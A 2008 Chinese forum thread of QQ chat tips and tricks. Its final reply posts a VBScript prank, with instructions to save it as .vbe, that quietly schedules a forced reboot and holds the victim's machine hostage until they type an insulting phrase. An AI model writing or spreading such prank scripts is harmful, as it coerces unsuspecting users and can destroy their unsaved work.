论坛风格切换
正版合作和侵权请联系 sd173@foxmail.com

• 用户
  • 版块
  • 群组
购买邀请后未收到邀请联系sdbeta@qq.com
  • 2770阅读
  • 6回复

[求助-硬件]我是这样聊QQ的【试运行】 [复制链接]

上一主题 下一主题
离线heiseyoumo

发帖
*
今日发帖
只看楼主 倒序阅读 使用道具 楼主  发表于: 2008-11-26 13:16:41
— 本帖被 heiseyoumo 执行取消置顶操作(2008-12-01) —
相关主题活动http://www.3dch.net/read.php?tid-64263.html

本帖欢迎大家就QQ的安全,使用等方面跟贴谈谈你的独家Q聊,在日常的工作学习生活中你是怎么玩转Q的,有哪些奇门怪招,新奇创新用法,看看民间的Q聊高手都在玩些什么!
2条评分
七夜漓伤 电魂 +5 2008-11-26
七夜漓伤 电魂 +5 2008-11-26
离线heiseyoumo
发帖
*
今日发帖
只看该作者 沙发  发表于: 2008-11-26 13:22:57
我先来一个:聊天时没事就搞搞拆字玩,让对方咪着看一会!
操作演示:

下载地址:http://www.uushare.com/user/lvsea2008/file/1037226
离线bbvsyt

发帖
今日发帖
只看该作者 板凳  发表于: 2008-11-26 13:29:36
真的很不错,没事的时候,好好研究一下.
离线zhujing
发帖
*
今日发帖
只看该作者 地板  发表于: 2008-11-26 13:29:38
就咱那点技术还真拿不出手啊,都是些基本的使用,咱都一样啊,没啥奇招,活动不错,偶会经常过来学习一下奇招
离线1448hao

发帖
今日发帖
只看该作者 地下室  发表于: 2008-11-26 13:34:54
呵呵,俺是带板凳来学习的
离线笨熊维尼

发帖
今日发帖
只看该作者 5 发表于: 2008-11-26 14:47:07
聊QQ也很少有什么怪招,说下小技巧吧,可能大家也都会

普通QQ用户每天帖图的数量有限,有时候会受限制发不了图,这时候可以右键你在QQ发送框里要发送的图片,然后添加到QQ表情,然后在QQ表情里将图发出去,因为QQ表情发送数量没有限制!
离线七夜漓伤
发帖
*
今日发帖
只看该作者 6 发表于: 2008-11-26 18:37:30
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"

把上面的文字复制到记事本内。另存为名字随便你起记住后面的一定要加 .vbe

貌似很多人都知道的